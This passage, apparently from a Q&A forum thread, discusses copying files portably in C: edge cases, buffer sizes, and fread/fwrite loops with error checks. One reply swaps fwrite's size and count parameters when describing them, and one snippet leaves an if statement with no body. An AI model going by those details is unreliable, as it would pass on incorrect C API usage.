    close(fdin);
    return -1;
}
But there are confounding factors:
you need to special-case when the files are the same, and I can't remember how to do that portably.
if the output filename is a directory, you might want to copy the file into the directory.
if the output file already exists (open with O_EXCL to determine this and check for EEXIST on error), you might want to do something different, as cp -i does.
you might want the permissions of the output file to reflect those of the input file.
you might want other platform-specific meta-data to be copied.
you may or may not wish to unlink the output file on error.
Obviously the answers to all these questions could be "do the same as cp". In which case the answer to the original question is "ignore everything I or anyone else has said, and use the source of cp".
Btw, getting the filesystem's cluster size is next to useless. You'll almost always see speed increasing with buffer size long after you've passed the size of a disk block.
The size of each read needs to be a multiple of 512 (the sector size); 4096 is a good one.
Here is a very easy and clear example: Copy a file. Since it is written in ANSI C without any platform-specific function calls, I think this one would be pretty portable.
Depending on what you mean by copying a file, it is certainly far from trivial. If you mean copying the content only, then there is almost nothing to do. But generally, you need to copy the metadata of the file, and that's surely platform dependent. I don't know of any C library which does what you want in a portable manner. Just handling the filename by itself is no trivial matter if you care about portability.
In C++, there is the file library in boost
One thing I found when implementing my own file copy, and it seems obvious but it's not: I/O's are slow. You can pretty much time your copy's speed by how many of them you do. So clearly you need to do as few of them as possible.
The best results I found were when I got myself a ginormous buffer, read the entire source file into it in one I/O, then wrote the entire buffer back out in one I/O. If I even had to do it in 10 batches, it got way slow. Trying to read and write each byte, like a naive coder might try first, was just painful.
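A sketch of that single-read, single-write copy, as a fragment assuming <sys/stat.h>, <stdlib.h> and <unistd.h> are included (the function name is mine):

int copy_whole_file(int fdin, int fdout) {
    struct stat st;
    if (fstat(fdin, &st) == -1) return -1;
    char *buf = malloc((size_t)st.st_size);          /* one giant buffer */
    if (buf == NULL) return -1;
    ssize_t n = read(fdin, buf, (size_t)st.st_size); /* one read... */
    int ok = n == (ssize_t)st.st_size
          && write(fdout, buf, (size_t)n) == n;      /* ...one write */
    free(buf);
    return ok ? 0 : -1;
}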
The accepted answer written by Steve Jessop does not answer the first part of the question; Jonathan Leffler does, but does it wrong: the code should be written as

while ((n = fread(buffer, 1, sizeof(buffer), f1)) > 0)
    if (fwrite(buffer, n, 1, f2) != 1)
        /* we got a write error here */
/* test ferror(f1) for read errors */
Explanation:
sizeof(char) is 1 by definition, always: it does not matter how many bits are in it, 8 (in most cases), 9, 11 or 32 (on some DSPs, for example); the size of char is one. Note that this is not an error in the original, just extra code.
The fwrite function writes up to nmemb (second argument) elements of the specified size (third argument); it is not required to write exactly nmemb elements. To fix this you must either write the rest of the data read, or just write one element of size n and let fwrite do all the work. (Whether fwrite should write all the data is debatable, but in this version a short write is impossible unless an error occurs.)
You should test for read errors too: just test ferror(f1) at the end of the loop.
Note, you probably need to disable buffering on both input and output files to prevent triple buffering: first on read into f1's buffer, second in our code, third on write into f2's buffer:
setvbuf(f1, NULL, _IONBF, 0);
setvbuf(f2, NULL, _IONBF, 0);
(Internal buffers should, probably, be of size BUFSIZ.)
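Putting those points together with Jonathan Leffler's original, the copy loop might read like this sketch (err_syserr() is the helper from that answer):

void fcopy(FILE *f1, FILE *f2)
{
    char buffer[BUFSIZ];
    size_t n;

    while ((n = fread(buffer, 1, sizeof(buffer), f1)) > 0)
    {
        if (fwrite(buffer, n, 1, f2) != 1) /* one element of size n: a short write is an error */
            err_syserr("write failed\n");
    }
    if (ferror(f1))                        /* distinguish a read error from EOF */
        err_syserr("read failed\n");
}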
